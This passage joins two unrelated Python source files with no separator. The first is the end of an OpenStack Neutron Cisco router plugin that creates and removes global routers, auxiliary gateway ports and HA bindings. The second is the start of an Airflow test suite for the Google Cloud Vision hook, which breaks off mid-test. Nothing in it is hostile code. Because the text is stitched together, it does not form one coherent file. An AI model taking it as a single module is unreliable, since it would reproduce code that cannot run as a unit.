                    'admin_state_up': True,
                    'name': ''}})
            router_port = bc.RouterPort(
                port_id=aux_gw_port['id'],
                router_id=global_router_id,
                port_type=port_type)
            context.session.add(router_port)
        return aux_gw_port

    def _create_global_router(
            self, context, hosting_device_id, hd_to_gr_dict, tenant_router,
            logical_global_router):
        r_spec = {'router': {
            # global routers are not tied to any tenant
            'tenant_id': '',
            'name': self._global_router_name(hosting_device_id),
            'admin_state_up': True}}
        global_router, r_hd_b_db = self._l3_plugin.do_create_router(
            context, r_spec, tenant_router[routertype.TYPE_ATTR], False,
            True, hosting_device_id, ROUTER_ROLE_GLOBAL)
        # make the global router a redundancy router for the logical
        # global router (which we treat as a hidden "user visible
        # router" (how's that for a contradiction of terms! :-) )
        with context.session.begin(subtransactions=True):
            ha_priority = (
                ha_db.DEFAULT_MASTER_PRIORITY -
                len(hd_to_gr_dict) * ha_db.PRIORITY_INCREASE_STEP)
            r_b_b = ha_db.RouterRedundancyBinding(
                redundancy_router_id=global_router['id'],
                priority=ha_priority,
                user_router_id=logical_global_router['id'])
            context.session.add(r_b_b)
        return global_router

    def _get_logical_global_router(self, context, tenant_router):
        # Since HA is also enabled on the global routers on each hosting device
        # those global routers need HA settings and VIPs. We represent that
        # using a Neutron router that is never instantiated/hosted. That
        # Neutron router is referred to as the "logical global" router.
        filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
                   routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
        logical_global_routers = self._l3_plugin.get_routers(
            context, filters=filters)
        if not logical_global_routers:
            # must create logical global router
            logical_global_router = self._create_logical_global_router(
                context, tenant_router)
        else:
            logical_global_router = logical_global_routers[0]
            self._update_ha_redundancy_level(context, logical_global_router, 1)
        return logical_global_router

    def _create_logical_global_router(self, context, tenant_router):
        r_spec = {'router': {
            # global routers are not tied to any tenant
            'tenant_id': '',
            'name': self._global_router_name('', logical=True),
            'admin_state_up': True,
            # set auto-schedule to false to keep this router un-hosted
            routertypeawarescheduler.AUTO_SCHEDULE_ATTR: False}}
        # notifications should never be sent for this logical router!
        logical_global_router, r_hd_b_db = (
            self._l3_plugin.do_create_router(
                context, r_spec, tenant_router[routertype.TYPE_ATTR],
                False, True, None, ROUTER_ROLE_LOGICAL_GLOBAL))
        with context.session.begin(subtransactions=True):
            r_ha_s_db = ha_db.RouterHASetting(
                router_id=logical_global_router['id'],
                ha_type=cfg.CONF.ha.default_ha_mechanism,
                redundancy_level=1,
                priority=ha_db.DEFAULT_MASTER_PRIORITY,
                probe_connectivity=False,
                probe_target=None,
                probe_interval=None)
            context.session.add(r_ha_s_db)
        return logical_global_router

    def _get_fixed_ips_subnets(self, context, gw_port):
        """Return fixed-ip specs covering every subnet of gw_port's network."""
        nw = self._core_plugin.get_network(context, gw_port['network_id'])
        subnets = [{'subnet_id': s} for s in nw['subnets']]
        return subnets

    def _provision_port_ha(self, context, ha_port, router, ha_binding_db=None):
        """Create the HA group DB entry for an auxiliary gateway (VIP) port."""
        ha_group_uuid = uuidutils.generate_uuid()
        router_id = router['id']
        with context.session.begin(subtransactions=True):
            if ha_binding_db is None:
                ha_binding_db = self._get_ha_binding(context, router_id)
            group_id = self.generate_ha_group_id(
                context, router,
                {'device_owner': DEVICE_OWNER_GLOBAL_ROUTER_GW}, ha_binding_db,
                ha_group_uuid)
            r_ha_g = ha_db.RouterHAGroup(
                id=ha_group_uuid,
                tenant_id='',
                ha_type=ha_binding_db.ha_type,
                group_identity=group_id,
                ha_port_id=ha_port['id'],
                extra_port_id=None,
                subnet_id=ha_port['fixed_ips'][0]['subnet_id'],
                user_router_id=router_id,
                timers_config='',
                tracking_config='',
                other_config='')
            context.session.add(r_ha_g)

    def _get_ha_binding(self, context, router_id):
        """Fetch the HA settings DB record for *router_id* (or None)."""
        with context.session.begin(subtransactions=True):
            query = context.session.query(ha_db.RouterHASetting)
            query = query.filter(
                ha_db.RouterHASetting.router_id == router_id)
            return query.first()

    # ---------------- Remove workflow functions -----------------

    def _conditionally_remove_global_router(self, context, tenant_router,
                                            update_operation=False):
        filters = {routertype.TYPE_ATTR: [tenant_router[routertype.TYPE_ATTR]],
                   routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_GLOBAL],
                   HOSTING_DEVICE_ATTR: [tenant_router[HOSTING_DEVICE_ATTR]]}
        global_routers = self._l3_plugin.get_routers(context,
                                                     filters=filters)
        hd_to_gr_dict = {r[HOSTING_DEVICE_ATTR]: r for r in global_routers}
        if global_routers:
            global_router_id = global_routers[0]['id']
            if not tenant_router or not tenant_router[l3.EXTERNAL_GW_INFO]:
                # let l3 plugin's periodic backlog processing take care of the
                # clean up of the global router
                return
            ext_net_id = tenant_router[l3.EXTERNAL_GW_INFO]['network_id']
            routertype_id = tenant_router[routertype.TYPE_ATTR]
            hd_id = tenant_router[HOSTING_DEVICE_ATTR]
            global_router = hd_to_gr_dict.get(hd_id)
            port_deleted = self._conditionally_remove_auxiliary_gateway_port(
                context, global_router_id, ext_net_id, routertype_id, hd_id,
                update_operation)
            if port_deleted is False:
                # since no auxiliary gateway port was deleted we can
                # abort now since auxiliary gateway port count cannot
                # have reached zero
                return
            filters = {
                'device_id': [global_router_id],
                'device_owner': [DEVICE_OWNER_GLOBAL_ROUTER_GW]}
            num_aux_gw_ports = self._core_plugin.get_ports_count(
                context, filters=filters)
            if num_aux_gw_ports == 0:
                # global router not needed any more so we delete it
                self._delete_global_router(context, global_router_id)
                do_notify = False
            else:
                do_notify = True
            # process logical global router to remove its port
            self._conditionally_remove_auxiliary_gateway_vip_port(
                context, ext_net_id, routertype_id)
            self._l3_plugin.add_type_and_hosting_device_info(context,
                                                             global_router)
            if do_notify is True:
                for ni in self._l3_plugin.get_notifiers(context,
                                                        [global_router]):
                    if ni['notifier']:
                        ni['notifier'].routers_updated(context, ni['routers'])

    def _conditionally_remove_auxiliary_gateway_port(
            self, context, router_id, ext_net_id, routertype_id,
            hosting_device_id, update_operation=False):
        num_rtrs = self._get_gateway_routers_count(
            context, ext_net_id, routertype_id, None, hosting_device_id)
        if ((num_rtrs <= 1 and update_operation is False) or
                (num_rtrs == 0 and update_operation is True)):
            # there are no tenant routers *on ext_net_id* that are serviced by
            # this global router so it's aux gw port can be deleted
            self._delete_auxiliary_gateway_ports(context, router_id,
                                                 ext_net_id)
            return True
        return False

    def _conditionally_remove_auxiliary_gateway_vip_port(
            self, context, ext_net_id, routertype_id):
        filters = {routertype.TYPE_ATTR: [routertype_id],
                   routerrole.ROUTER_ROLE_ATTR: [ROUTER_ROLE_LOGICAL_GLOBAL]}
        log_global_routers = self._l3_plugin.get_routers(context,
                                                         filters=filters)
        if not log_global_routers:
            return
        self._update_ha_redundancy_level(context, log_global_routers[0], -1)
        log_global_router_id = log_global_routers[0]['id']
        num_global_rtrs = self._get_gateway_routers_count(
            context, ext_net_id, routertype_id, ROUTER_ROLE_GLOBAL)
        if num_global_rtrs == 0:
            # there are no global routers *on ext_net_id* that are serviced by
            # this logical global router so it's aux gw VIP port can be deleted
            self._delete_auxiliary_gateway_ports(context, log_global_router_id,
                                                 ext_net_id)
        filters[routerrole.ROUTER_ROLE_ATTR] = [ROUTER_ROLE_GLOBAL]
        total_num_global_rtrs = self._l3_plugin.get_routers_count(
            context, filters=filters)
        if total_num_global_rtrs == 0:
            # there are no global routers left that are serviced by this
            # logical global router so it can be deleted
            self._delete_global_router(context, log_global_router_id, True)
        return False

    def _delete_auxiliary_gateway_ports(
            self, context, router_id, net_id=None,
            port_type=DEVICE_OWNER_GLOBAL_ROUTER_GW):
        """Delete router_id's aux gateway ports (optionally only on net_id)."""
        filters = {
            'device_id': [router_id],
            'device_owner': [port_type]}
        if net_id is not None:
            filters['network_id'] = [net_id]
        for port in self._core_plugin.get_ports(context, filters=filters):
            try:
                self._core_plugin.delete_port(context, port['id'],
                                              l3_port_check=False)
            except (exc.ObjectDeletedError, n_exc.PortNotFound) as e:
                # best effort: the port may already be gone
                LOG.warning(e)

    def _delete_global_router(self, context, global_router_id, logical=False):
        # ensure we clean up any stale auxiliary gateway ports
        self._delete_auxiliary_gateway_ports(context, global_router_id)
        try:
            if logical is True:
                # We use parent class method as no special operations beyond
                # what the base implemenation does are needed for logical
                # global router
                super(L3RouterApplianceDBMixin, self._l3_plugin).delete_router(
                        context, global_router_id)
            else:
                self._l3_plugin.delete_router(
                    context, global_router_id, unschedule=False)
        except (exc.ObjectDeletedError, l3.RouterNotFound) as e:
            # best effort: the router may already be gone
            LOG.warning(e)

    def _get_gateway_routers_count(self, context, ext_net_id, routertype_id,
                                   router_role, hosting_device_id=None):
        # Determine number of routers (with routertype_id and router_role)
        # that act as gateway to ext_net_id and that are hosted on
        # hosting_device_id (if specified).
        query = context.session.query(bc.Router)
        if router_role in [None, ROUTER_ROLE_HA_REDUNDANCY]:
            # tenant router roles
            query = query.join(models_v2.Port,
                               models_v2.Port.id == bc.Router.gw_port_id)
            role_filter = expr.or_(
                l3_models.RouterHostingDeviceBinding.role == expr.null(),
                l3_models.RouterHostingDeviceBinding.role ==
                ROUTER_ROLE_HA_REDUNDANCY)
        else:
            # global and logical global routers have no traditional gateway
            # port; their auxiliary gateway ports reference the router via
            # the port's device_id (see _create_auxiliary_external_gateway
            # _port). The previous join compared Port.device_owner (an owner
            # string) to the router id, which could never match.
            query = query.join(models_v2.Port,
                               models_v2.Port.device_id == bc.Router.id)
            role_filter = (
                l3_models.RouterHostingDeviceBinding.role == router_role)
        query = query.join(
            l3_models.RouterHostingDeviceBinding,
            l3_models.RouterHostingDeviceBinding.router_id == bc.Router.id)
        query = query.filter(
            role_filter,
            models_v2.Port.network_id == ext_net_id,
            l3_models.RouterHostingDeviceBinding.router_type_id ==
            routertype_id)
        if hosting_device_id is not None:
            query = query.filter(
                l3_models.RouterHostingDeviceBinding.hosting_device_id ==
                hosting_device_id)
        return query.count()

    # ---------------- General support functions -----------------

    def _update_ha_redundancy_level(self, context, logical_global_router,
                                    delta):
        """Adjust the logical global router's redundancy level by *delta*."""
        with context.session.begin(subtransactions=True):
            log_g_router_db = self._l3_plugin._get_router(
                context, logical_global_router['id'])
            log_g_router_db.ha_settings.redundancy_level += delta
            context.session.add(log_g_router_db.ha_settings)

    def _router_name(self, router_id):
        return N_ROUTER_PREFIX + router_id

    def _global_router_name(self, hosting_device_id, logical=False):
        if logical is True:
            return cisco_constants.LOGICAL_ROUTER_ROLE_NAME
        else:
            return '%s-%s' % (cisco_constants.ROUTER_ROLE_NAME_PREFIX,
                              hosting_device_id[-cisco_constants.ROLE_ID_LEN:])

    @property
    def _core_plugin(self):
        return bc.get_plugin()

    @property
    def _l3_plugin(self):
        return bc.get_plugin(bc.constants.L3)

#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements.  See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership.  The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License.  You may obtain a copy of the License at
#
#   http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied.  See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock

import pytest
from google.cloud.vision import enums
from google.cloud.vision_v1 import ProductSearchClient
from google.cloud.vision_v1.proto.image_annotator_pb2 import (
    AnnotateImageResponse,
    EntityAnnotation,
    SafeSearchAnnotation,
)
from google.cloud.vision_v1.proto.product_search_service_pb2 import Product, ProductSet, ReferenceImage
from google.protobuf.json_format import MessageToDict
from parameterized import parameterized

from airflow.exceptions import AirflowException
from airflow.providers.google.cloud.hooks.vision import ERR_DIFF_NAMES, ERR_UNABLE_TO_CREATE, CloudVisionHook
from tests.providers.google.cloud.utils.base_gcp_mock import mock_base_gcp_hook_default_project_id

# Fixture ids used throughout the tests to build expected resource paths.
PROJECT_ID_TEST = 'project-id'
PROJECT_ID_TEST_2 = 'project-id-2'
LOC_ID_TEST = 'loc-id'
LOC_ID_TEST_2 = 'loc-id-2'
PRODUCTSET_ID_TEST = 'ps-id'
PRODUCTSET_ID_TEST_2 = 'ps-id-2'
# Fully qualified ProductSet resource name built from the fixture ids above.
PRODUCTSET_NAME_TEST = f'projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/productSets/{PRODUCTSET_ID_TEST}'
PRODUCT_ID_TEST = 'p-id'
PRODUCT_ID_TEST_2 = 'p-id-2'
# Two aliases for the same fully qualified Product resource name.
PRODUCT_NAME_TEST = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
PRODUCT_NAME = f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/{PRODUCT_ID_TEST}"
# NOTE: the "generated" id deliberately equals the explicit id, so both the
# explicit-id and autogenerated-id reference-image tests expect the same value.
REFERENCE_IMAGE_ID_TEST = 'ri-id'
REFERENCE_IMAGE_GEN_ID_TEST = 'ri-id'
# Single annotate-image request payload (logo detection on a GCS object).
ANNOTATE_IMAGE_REQUEST = {
    'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
    'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
}
# Batch variant: two copies of the same logo-detection request.
BATCH_ANNOTATE_IMAGE_REQUEST = [
    {
        'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
        'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
    },
    {
        'image': {'source': {'image_uri': "gs://bucket-name/object-name"}},
        'features': [{'type': enums.Feature.Type.LOGO_DETECTION}],
    },
]
# Fully qualified ReferenceImage resource name (nested under a product path).
REFERENCE_IMAGE_NAME_TEST = (
    f"projects/{PROJECT_ID_TEST}/locations/{LOC_ID_TEST}/products/"
    f"{PRODUCTSET_ID_TEST}/referenceImages/{REFERENCE_IMAGE_ID_TEST}"
)
# ReferenceImage fixtures: one carrying a name, one without.
REFERENCE_IMAGE_TEST = ReferenceImage(name=REFERENCE_IMAGE_GEN_ID_TEST)
REFERENCE_IMAGE_WITHOUT_ID_NAME = ReferenceImage()
DETECT_TEST_IMAGE = {"source": {"image_uri": "https://foo.com/image.jpg"}}
DETECT_TEST_ADDITIONAL_PROPERTIES = {"test-property-1": "test-value-1", "test-property-2": "test-value-2"}


class TestGcpVisionHook(unittest.TestCase):
    def setUp(self):
        """Create a CloudVisionHook whose base-hook __init__ is mocked out."""
        init_patch = mock.patch(
            'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.__init__',
            new=mock_base_gcp_hook_default_project_id,
        )
        with init_patch:
            self.hook = CloudVisionHook(gcp_conn_id='test')

    @mock.patch(
        "airflow.providers.google.cloud.hooks.vision.CloudVisionHook.client_info",
        new_callable=mock.PropertyMock,
    )
    @mock.patch("airflow.providers.google.cloud.hooks.vision.CloudVisionHook._get_credentials")
    @mock.patch("airflow.providers.google.cloud.hooks.vision.ProductSearchClient")
    def test_product_search_client_creation(self, mock_client, mock_get_creds, mock_client_info):
        """get_conn() builds a ProductSearchClient once and caches it on _client."""
        client = self.hook.get_conn()

        mock_client.assert_called_once_with(
            credentials=mock_get_creds.return_value, client_info=mock_client_info.return_value
        )
        assert client == mock_client.return_value
        assert self.hook._client == client

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_productset_explicit_id(self, get_conn):
        """An explicitly supplied ProductSet id is echoed back by the hook."""
        create_product_set_method = get_conn.return_value.create_product_set
        create_product_set_method.return_value = None
        product_set = ProductSet()

        returned_id = self.hook.create_product_set(
            location=LOC_ID_TEST,
            product_set_id=PRODUCTSET_ID_TEST,
            product_set=product_set,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

        assert returned_id == PRODUCTSET_ID_TEST
        expected_parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
        create_product_set_method.assert_called_once_with(
            parent=expected_parent,
            product_set=product_set,
            product_set_id=PRODUCTSET_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_productset_autogenerated_id(self, get_conn):
        """Without an explicit id, the id is parsed out of the response name."""
        autogen_id = 'autogen-id'
        create_product_set_method = get_conn.return_value.create_product_set
        create_product_set_method.return_value = ProductSet(
            name=ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, autogen_id)
        )
        product_set = ProductSet()

        returned_id = self.hook.create_product_set(
            location=LOC_ID_TEST, product_set_id=None, product_set=product_set, project_id=PROJECT_ID_TEST
        )

        # No id was passed in, so the hook must extract it from the API response.
        assert returned_id == autogen_id
        create_product_set_method.assert_called_once_with(
            parent=ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST),
            product_set=product_set,
            product_set_id=None,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_productset_autogenerated_id_wrong_api_response(self, get_conn):
        """A None API response makes ProductSet id extraction fail loudly."""
        create_product_set_method = get_conn.return_value.create_product_set
        create_product_set_method.return_value = None
        product_set = ProductSet()

        with pytest.raises(AirflowException) as ctx:
            self.hook.create_product_set(
                location=LOC_ID_TEST,
                product_set_id=None,
                product_set=product_set,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )

        assert 'Unable to get name from response...' in str(ctx.value)
        create_product_set_method.assert_called_once_with(
            parent=ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST),
            product_set=product_set,
            product_set_id=None,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_get_productset(self, get_conn):
        """get_product_set returns the API response serialized to a dict."""
        ps_name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)
        api_product_set = ProductSet(name=ps_name)
        get_product_set_method = get_conn.return_value.get_product_set
        get_product_set_method.return_value = api_product_set

        result = self.hook.get_product_set(
            location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
        )

        assert result
        assert result == MessageToDict(api_product_set)
        get_product_set_method.assert_called_once_with(name=ps_name, retry=None, timeout=None, metadata=None)

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_productset_no_explicit_name(self, get_conn):
        """When the ProductSet carries no name, one is built from the params."""
        product_set = ProductSet()
        update_product_set_method = get_conn.return_value.update_product_set
        update_product_set_method.return_value = product_set

        result = self.hook.update_product_set(
            location=LOC_ID_TEST,
            product_set_id=PRODUCTSET_ID_TEST,
            product_set=product_set,
            update_mask=None,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

        assert result == MessageToDict(product_set)
        constructed_name = ProductSearchClient.product_set_path(
            PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
        )
        update_product_set_method.assert_called_once_with(
            product_set=ProductSet(name=constructed_name),
            metadata=None,
            retry=None,
            timeout=None,
            update_mask=None,
        )

    @parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_productset_no_explicit_name_and_missing_params_for_constructed_name(
        self, location, product_set_id, get_conn
    ):
        """Missing name params with an unnamed ProductSet raise before any API call."""
        update_product_set_method = get_conn.return_value.update_product_set
        update_product_set_method.return_value = None

        with pytest.raises(AirflowException) as ctx:
            self.hook.update_product_set(
                location=location,
                product_set_id=product_set_id,
                product_set=ProductSet(),
                update_mask=None,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )

        assert ctx.value
        assert ERR_UNABLE_TO_CREATE.format(label='ProductSet', id_label='productset_id') in str(ctx.value)
        update_product_set_method.assert_not_called()

    @parameterized.expand([(None, None), (None, PRODUCTSET_ID_TEST), (LOC_ID_TEST, None)])
    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_productset_explicit_name_missing_params_for_constructed_name(
        self, location, product_set_id, get_conn
    ):
        """A ProductSet with an explicit name works even if name params are missing."""
        preset_name = ProductSearchClient.product_set_path(
            PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
        )
        product_set = ProductSet(name=preset_name)
        update_product_set_method = get_conn.return_value.update_product_set
        update_product_set_method.return_value = product_set

        result = self.hook.update_product_set(
            location=location,
            product_set_id=product_set_id,
            product_set=product_set,
            update_mask=None,
            project_id=PROJECT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

        assert result == MessageToDict(product_set)
        update_product_set_method.assert_called_once_with(
            product_set=ProductSet(name=preset_name),
            metadata=None,
            retry=None,
            timeout=None,
            update_mask=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_productset_explicit_name_different_from_constructed(self, get_conn):
        """Conflicting explicit vs. constructed ProductSet names raise an error."""
        update_product_set_method = get_conn.return_value.update_product_set
        update_product_set_method.return_value = None
        explicit_name = ProductSearchClient.product_set_path(
            PROJECT_ID_TEST_2, LOC_ID_TEST_2, PRODUCTSET_ID_TEST_2
        )
        constructed_name = ProductSearchClient.product_set_path(
            PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST
        )

        # location/product_set_id yield a name differing from the explicit one,
        # which the hook must reject.
        with pytest.raises(AirflowException) as ctx:
            self.hook.update_product_set(
                location=LOC_ID_TEST,
                product_set_id=PRODUCTSET_ID_TEST,
                product_set=ProductSet(name=explicit_name),
                update_mask=None,
                project_id=PROJECT_ID_TEST,
                retry=None,
                timeout=None,
                metadata=None,
            )

        expected_message = ERR_DIFF_NAMES.format(
            explicit_name=explicit_name,
            constructed_name=constructed_name,
            label="ProductSet",
            id_label="productset_id",
        )
        assert ctx.value
        assert expected_message in str(ctx.value)
        update_product_set_method.assert_not_called()

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_delete_productset(self, get_conn):
        """delete_product_set returns None and targets the constructed name."""
        delete_product_set_method = get_conn.return_value.delete_product_set
        delete_product_set_method.return_value = None
        expected_name = ProductSearchClient.product_set_path(PROJECT_ID_TEST, LOC_ID_TEST, PRODUCTSET_ID_TEST)

        result = self.hook.delete_product_set(
            location=LOC_ID_TEST, product_set_id=PRODUCTSET_ID_TEST, project_id=PROJECT_ID_TEST
        )

        assert result is None
        delete_product_set_method.assert_called_once_with(
            name=expected_name, retry=None, timeout=None, metadata=None
        )

    @mock.patch(
        'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
        **{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
    )
    def test_create_reference_image_explicit_id(self, get_conn):
        """An explicitly supplied reference-image id is echoed back by the hook."""
        create_reference_image_method = get_conn.return_value.create_reference_image

        returned_id = self.hook.create_reference_image(
            project_id=PROJECT_ID_TEST,
            location=LOC_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
            reference_image_id=REFERENCE_IMAGE_ID_TEST,
        )

        assert returned_id == REFERENCE_IMAGE_ID_TEST
        create_reference_image_method.assert_called_once_with(
            parent=PRODUCT_NAME,
            reference_image=REFERENCE_IMAGE_WITHOUT_ID_NAME,
            reference_image_id=REFERENCE_IMAGE_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch(
        'airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn',
        **{'return_value.create_reference_image.return_value': REFERENCE_IMAGE_TEST},
    )
    def test_create_reference_image_autogenerated_id(self, get_conn):
        """With a named ReferenceImage, the id from the response name is returned."""
        create_reference_image_method = get_conn.return_value.create_reference_image

        returned_id = self.hook.create_reference_image(
            project_id=PROJECT_ID_TEST,
            location=LOC_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            reference_image=REFERENCE_IMAGE_TEST,
            reference_image_id=REFERENCE_IMAGE_ID_TEST,
        )

        assert returned_id == REFERENCE_IMAGE_GEN_ID_TEST
        create_reference_image_method.assert_called_once_with(
            parent=PRODUCT_NAME,
            reference_image=REFERENCE_IMAGE_TEST,
            reference_image_id=REFERENCE_IMAGE_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_add_product_to_product_set(self, get_conn):
        """add_product_to_product_set forwards the constructed resource names."""
        add_method = get_conn.return_value.add_product_to_product_set

        self.hook.add_product_to_product_set(
            product_set_id=PRODUCTSET_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            location=LOC_ID_TEST,
            project_id=PROJECT_ID_TEST,
        )

        add_method.assert_called_once_with(
            name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_remove_product_from_product_set(self, get_conn):
        """remove_product_from_product_set forwards the constructed resource names."""
        remove_method = get_conn.return_value.remove_product_from_product_set

        self.hook.remove_product_from_product_set(
            product_set_id=PRODUCTSET_ID_TEST,
            product_id=PRODUCT_ID_TEST,
            location=LOC_ID_TEST,
            project_id=PROJECT_ID_TEST,
        )

        remove_method.assert_called_once_with(
            name=PRODUCTSET_NAME_TEST, product=PRODUCT_NAME_TEST, retry=None, timeout=None, metadata=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
    def test_annotate_image(self, annotator_client_mock):
        """annotate_image forwards the request to the annotator client."""
        annotate_method = annotator_client_mock.annotate_image

        self.hook.annotate_image(request=ANNOTATE_IMAGE_REQUEST)

        annotate_method.assert_called_once_with(
            request=ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.annotator_client')
    def test_batch_annotate_images(self, annotator_client_mock):
        """batch_annotate_images forwards the request list to the annotator client."""
        batch_method = annotator_client_mock.batch_annotate_images

        self.hook.batch_annotate_images(requests=BATCH_ANNOTATE_IMAGE_REQUEST)

        batch_method.assert_called_once_with(
            requests=BATCH_ANNOTATE_IMAGE_REQUEST, retry=None, timeout=None
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_product_explicit_id(self, get_conn):
        """An explicitly supplied Product id is echoed back by the hook."""
        create_product_method = get_conn.return_value.create_product
        create_product_method.return_value = None
        product = Product()

        returned_id = self.hook.create_product(
            location=LOC_ID_TEST, product_id=PRODUCT_ID_TEST, product=product, project_id=PROJECT_ID_TEST
        )

        assert returned_id == PRODUCT_ID_TEST
        expected_parent = ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST)
        create_product_method.assert_called_once_with(
            parent=expected_parent,
            product=product,
            product_id=PRODUCT_ID_TEST,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_product_autogenerated_id(self, get_conn):
        """Without an explicit id, the Product id comes from the response name."""
        autogen_id = 'autogen-p-id'
        create_product_method = get_conn.return_value.create_product
        create_product_method.return_value = Product(
            name=ProductSearchClient.product_path(PROJECT_ID_TEST, LOC_ID_TEST, autogen_id)
        )
        product = Product()

        returned_id = self.hook.create_product(
            location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
        )

        # No id was passed in, so the hook must extract it from the API response.
        assert returned_id == autogen_id
        create_product_method.assert_called_once_with(
            parent=ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST),
            product=product,
            product_id=None,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_product_autogenerated_id_wrong_name_in_response(self, get_conn):
        """A malformed response name makes Product id extraction fail loudly."""
        create_product_method = get_conn.return_value.create_product
        create_product_method.return_value = Product(name='wrong_name_not_a_correct_path')
        product = Product()

        with pytest.raises(AirflowException) as ctx:
            self.hook.create_product(
                location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
            )

        assert 'Unable to get id from name' in str(ctx.value)
        create_product_method.assert_called_once_with(
            parent=ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST),
            product=product,
            product_id=None,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_create_product_autogenerated_id_wrong_api_response(self, get_conn):
        """A None API response makes Product id extraction fail loudly."""
        create_product_method = get_conn.return_value.create_product
        create_product_method.return_value = None
        product = Product()

        with pytest.raises(AirflowException) as ctx:
            self.hook.create_product(
                location=LOC_ID_TEST, product_id=None, product=product, project_id=PROJECT_ID_TEST
            )

        assert 'Unable to get name from response...' in str(ctx.value)
        create_product_method.assert_called_once_with(
            parent=ProductSearchClient.location_path(PROJECT_ID_TEST, LOC_ID_TEST),
            product=product,
            product_id=None,
            retry=None,
            timeout=None,
            metadata=None,
        )

    @mock.patch('airflow.providers.google.cloud.hooks.vision.CloudVisionHook.get_conn')
    def test_update_product_no_explicit_name(self, get_conn):
        """When the Product carries no name, one is built from the params."""
        product = Product()
        update_product_method = get_conn.return_value.update_product
        update_product_method.return_value = product

        result = self.hook.update_product(
